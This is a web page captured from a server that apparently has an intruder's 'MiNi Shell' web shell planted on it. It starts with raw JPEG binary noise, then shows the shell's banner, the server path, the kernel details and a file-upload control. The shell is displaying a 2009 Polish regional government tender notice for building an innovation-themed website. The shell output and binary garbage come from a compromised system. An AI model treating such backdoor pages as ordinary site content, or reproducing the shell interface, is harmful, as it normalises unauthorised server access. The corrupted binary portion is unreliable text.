JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090205/19204-N-2009.html

<p class="kh_header"><b>Wrocław: Stworzenie i obsługę strony internetowej o tematyce innowacyjnej w ramach projektu pn.: Rozwój, koordynacja, monitoring i ewaluacja dolnośląskiego systemu innowacji</b><br>
<b>Numer ogłoszenia: 19204 - 2009; data zamieszczenia: 05.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Dolnośląskie - Urząd Marszałkowski Województwa Dolnośląskiego , ul. Wybrzeże J. Słowackiego 12-14, 50-411 Wrocław, woj. dolnośląskie, tel. 071 7769397,7769703-05,7779229, faks 071 7769141, 7769702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umwd.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Stworzenie i obsługę strony internetowej o tematyce innowacyjnej w ramach projektu pn.: Rozwój, koordynacja, monitoring i ewaluacja dolnośląskiego systemu innowacji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Wykonawca zobowiązuje się do wykonania projektu strony w formie elektronicznej wraz z zawartością merytoryczną i graficzną, zarówno strony głównej oraz podstron, a ponadto systemu linków i banerów wraz z ich wzajemną hierarchią powiązań, zgodnie ze szczegółowymi wymaganiami dotyczącymi przedmiotu zamówienia opisanymi poniżej:
1)   Wykonawca przedstawia pięć propozycji projektu graficznego strony, z których Zamawiający wybiera jeden odpowiadający projekt graficzny,
2)   projekty graficzne strony zostaną przedstawione Zamawiającemu do akceptacji na nośniku CD oraz w formie wydruku kolorowego poszczególnych stron i podstron,
3)   Wykonawca zobowiązuje się do wykonania strony, zgodnie z zaakceptowanym przez Zamawiającego projektem i z uwzględnieniem następujących parametrów i wytycznych:
a)  strona ma być wykonana w technologii xml 1.0 stict (tj. Xhtml 4.1, minimum PHP5, minimum MySQL 5), z użyciem formatowania za pomocą css, spełniającej standardy w3org. Za standard kodowania znaków przyjmuje się UTF-8,
b)  składniki strony muszą być dostosowane do większości popularnych przeglądarek internetowych - muszą prawidłowo obsługiwać - IE od wersji 6.0 wzwyż, Opera 8.5 , Firefox 2.0 wzwyż oraz być dostosowana do rozdzielczości monitora 1024x768 pikseli, kolorystyka minimum 32 bity,
c)  strona będzie miała 1 wersje językową - polską. 
d)  na stronie musi wyświetlać się ścieżka dostępu,
e)  strona winna być wykonana z wykorzystaniem Content Managment System (CMS):
-    warstwa zarządzania treścią musi być całkowicie oddzielona od warstwy prezentacji danych,
-    zarządzanie treścią strony winno być możliwe bez konieczności pracy na otwartym kodzie HTML,
-   system musi umożliwiać zarządzanie zespołem redakcyjnym strony,
-    ze względu na zastosowane w Urzędzie Marszałkowskim rozwiązania strony powinny być wykonane z wykorzystaniem technologii Joomla 1.5 PL (lub wyższej) lub równoważnej. W przypadku wykorzystania systemu innego niż Joomla 1.5 PL wymagane jest potwierdzenie równoważności w formie prezentacji.
-    w czasie trwania umowy Wykonawca zobowiązuje się do uaktualniania wersji systemu CMS, jak również zainstalowanych komponentów, modułów i pluginów,
-    Wykonawca zobowiązuje się do przekazania dokumentacji związanej z CMS, tj. ilustrowana instrukcja obsługi (szczególnie do zainstalowanych komponentów, modułów, pluginów). Lista zainstalowanych komponentów, modułów, pluginów wraz z licencjami wykupionymi na urząd, gdy takie są potrzebne, szczegółowa lista zmian wprowadzonych w/w dodatków. Instrukcja zostanie dostarczona w formie papierowej (szt. 4) oraz elektronicznej na płycie CD w formacie PDF.
f)  strona będzie posiadać do 3 poziomów edycyjnych. Każda podstrona może posiadać w menu dalsze podstrony, do 3 poziomu szczegółowości,
g)  Zamawiający będzie miał prawo do zmian struktury merytorycznej już gotowej i uruchomionej strony w miarę własnych potrzeb i wytycznych odpowiednich instytucji, 
h)  strona winna dodatkowo posiadać elementy typu: poleć znajomemu, statystyki (w szczególności ilość wyświetleń poszczególnych podstron, jak również newsów), licznik odwiedzin widoczny tylko dla Administratora (Zamawiającego), wyszukiwarka, subskrypcja/newsletter, galeria zdjęć (wyświetlanie powiększeń zdjęć powinno być realizowane w technologii flash), sonda/ankieta oraz dział plików, 
i) strona główna może zawierać elementy animowane wykonane w technologii Flash/GIF. Wykonawca zobowiązuje się do przekazania źródeł plików graficznych w formatach *.psd, *.cdr, *.ai, *.fla (dla gifów animowanych plik źródłowy). Prezentacja elementów animowanych powinna być ukazana podczas prezentacji pierwszego projektu gotowej strony.
j)  grafika strony/układ strony musi być zgodny z wymaganiami związanymi z promocją źródła dofinansowania projektu. Zamawiający zobowiązuje się do przekazania Wykonawcy niezbędnych materiałów w wersji elektronicznej, w dniu osobistego dostarczenia do siedziby Zamawiającego podpisanych przez Wykonawcę 3 egzemplarzy umowy, o których mowa w §5 ust. 1 Umowy,
k)  Wykonawca zobowiązuje się do wykonania 3 bannerów graficznych służących reklamowaniu strony w innych serwisach w rozmiarach 120x60, 125x125 i 234x60 pikseli,
l)  Wykonawca wraz z Zamawiającym wspólnie współpracują nad formą graficzną strony (projekt graficzny). Zamawiający ma obowiązek przedstawić Wykonawcy ogólną ideę strony, natomiast Wykonawca jest zobowiązany do rzetelnego informowania Zamawiającego o funkcjonalności jego pomysłów, a także zobowiązany jest do przedstawiania (zgodnie z posiadaną wiedzą i doświadczeniem) najbardziej funkcjonalnych rozwiązań powstającej strony. Na podstawie zaakceptowanego przez Zamawiającego projektu graficznego wykonana zostanie strona internetowa. Prawa autorskie do design strony będą własnością Urzędu Marszałkowskiego Województwa Dolnośląskiego, 
m)  strona musi spełniać podstawowe wymogi bezpieczeństwa, zastosowane komponenty nie mogą korzystać z registry globals ustawione na on,
4) Wykonawca w przeciągu 5 dni od umieszczenia przez Zamawiającego gotowej strony na serwerze i braku uwag co do jej funkcjonowania, w umówionym z Zamawiającym terminie przyjedzie do siedziby Zamawiającego i przeszkoli 4 wskazane osoby z obsługi systemu CMS.
 
2.	Wykonawca zobowiązuje się do obsługi strony, o której mowa w §1 ust. 2 Umowy,  w całym okresie obowiązywania umowy, począwszy od momentu protokolarnego odbioru Strony, o którym mowa w § 6 ust.4 Umowy. Obsługa strony będzie polegać na:
1)	bieżącej aktualizacji strony, obejmującej zamieszczanie na stronie materiałów (treści, plików graficznych oraz multimedialnych) przekazywanych przez Zamawiającego, aktualizację komponentów, pomoc techniczną oraz asystę informatyczną w formie telefonicznych konsultacji merytorycznych.
2)	Zamawiający będzie przesyłał Wykonawcy materiały do umieszczenia na stronie drogą elektroniczną lub faksem lub pisemnie.
3)	Wykonawca przekazane przez Zamawiającego materiały umieści na stronie w przeciągu 24 godzin od daty przekazania w dniach roboczych (od poniedziałku do piątku)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 72.59.00.00-7, 72.40.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie niniejszego zamówienia mogą się ubiegać wykonawcy, którzy:
a)	posiadają uprawnienia niezbędne do wykonywania działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; tj.: wykażą się, w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie: wykonali minimum dwie usługi, odpowiadające przedmiotowi niniejszego zamówienia tzn. przygotowali minimum 2 strony internetowe w formie elektronicznej, o wartości nie mniejszej niż 15 tys. zł brutto każda;
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podst. art. 24 ust. 1 
i ust. 2.
2.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o zamówienie. Przy ocenie spełniania warunków przez osoby wspólnie składające ofertę Zamawiający przyjmuje, że wymagania o charakterze podmiotowym powinni spełniać wszyscy współubiegający się                  o zamówienie, natomiast wymagania dotyczące posiadania niezbędnej wiedzy i doświadczenia oraz dysponowania osobami zdolnymi do wykonania zamówienia mogą spełniać tylko niektórzy  z tych Wykonawców, tak by sumarycznie w odniesieniu do wszystkich tych Wykonawców były spełnione łącznie.
3.	Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia 
w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych 
w rozdziale VI SIWZ. 
4.	Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił.
5.	Zamawiający wzywa do uzupełnienia oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu na zasadach określonych art. 26 ust.3 Ustawy Pzp.
6.	Nie spełnienie któregokolwiek z ww. warunków udziału w postępowaniu skutkować będzie wykluczeniem wykonawcy z postępowania, z zastrzeżeniem art. 26 ust. 3 Ustawy Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> VI.1.Wykonawcy składają wraz z ofertą następujące dokumenty:
1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku gdy wykonawcą jest podmiot zobowiązany do rejestracji w Krajowym Rejestrze Sądowym, a w załączonym odpisie z rejestru nie uwzględniono zmian w tekście dokumentu, wykonawca dodatkowo zobowiązany jest do dołączenia do oferty dowodu złożenia w sądzie rejestrowym ww. zmian.
2.	Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu na podstawie 
art. 22 ust 1 pkt 1-4 (wzór oświadczenia stanowi Załącznik nr 2 do SIWZ). W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,  Wykonawcy mogą złożyć oświadczenie wspólnie na jednym dokumencie  (oświadczenie podpisane przez Pełnomocnika lub przez każdego z Wykonawców odrębnie) lub każdy z nich na odrębnym dokumencie.
3.	Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych, również wykonywanych usług  w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, polegających na wykonaniu usług określonych w Rozdziale V pkt 1 lit. b, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z  dokumentami potwierdzającymi, że zamówienia te zostały wykonane należycie ( Załącznik nr 3 do SIWZ).

VI.2. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa:
1) zamiast dokumentów, o których mowa w rozdz. VI. pkt 1 ppkt 1 SIWZ dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
-	nie otwarto jego likwidacji ani nie ogłoszono upadłości, (powinny być wystawione nie wcześniej niż, 6 miesięcy przed upływem terminu składania ofert w postępowaniu 
o udzielenie zamówienia.);
-	nie orzeczono wobec niego zakazu ubiegania się o zamówienie (powinny być wystawione nie wcześniej niż, 6 miesięcy przed upływem terminu składania ofert w postępowaniu 
o udzielenie zamówienia.).
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się ww. dokumentu lub dokumentów zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Dokumenty te powinny być wystawione w terminach określonych odpowiednio powyżej w pkt 1). 

Dokumenty, są składane w formie oryginału lub kopii poświadczonej przez wykonawcę za zgodność  z oryginałem. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę.

Pozostałe dokumenty z punktu VI Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa w formie i treści w nim określonej.

VI.3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego
1.	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu lub do reprezentowania ich w niniejszym postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2.	Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.
3.	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana 
za najkorzystniejszą, przed zawarciem umowy o realizację zamówienia są zobowiązani przedłożyć Zamawiającemu umowę regulującą współpracę tych Wykonawców. W tym celu przed podpisaniem umowy o niniejsze zamówienie są oni zobowiązani przedstawić Zamawiającemu stosowne porozumienie (umowę) zawierające w swojej treści co najmniej następujące postanowienia:
a)	zawiązania porozumienia co najmniej na czas nie krótszy niż czas trwania umowy,
b)	wskazanie Pełnomocnika,
c)	zapis o wspólnej i solidarnej odpowiedzialności w zakresie realizowanego zamówienia,
d)	zakaz zmiany Partnerów (Wykonawców) wspólnie realizujących dane zamówienie publiczne w trakcie jego obowiązywania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.umwd.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Dolnośląskiego
Wybrzeże J. Słowackiego 12 - 14, 
50 - 411 Wrocław.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.02.2009 godzina 09:30, miejsce: Urząd Marszałkowski Województwa Dolnośląskiego
Wybrzeże J. Słowackiego 12 - 14, 
50 - 411 Wrocław
pok. nr 101.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com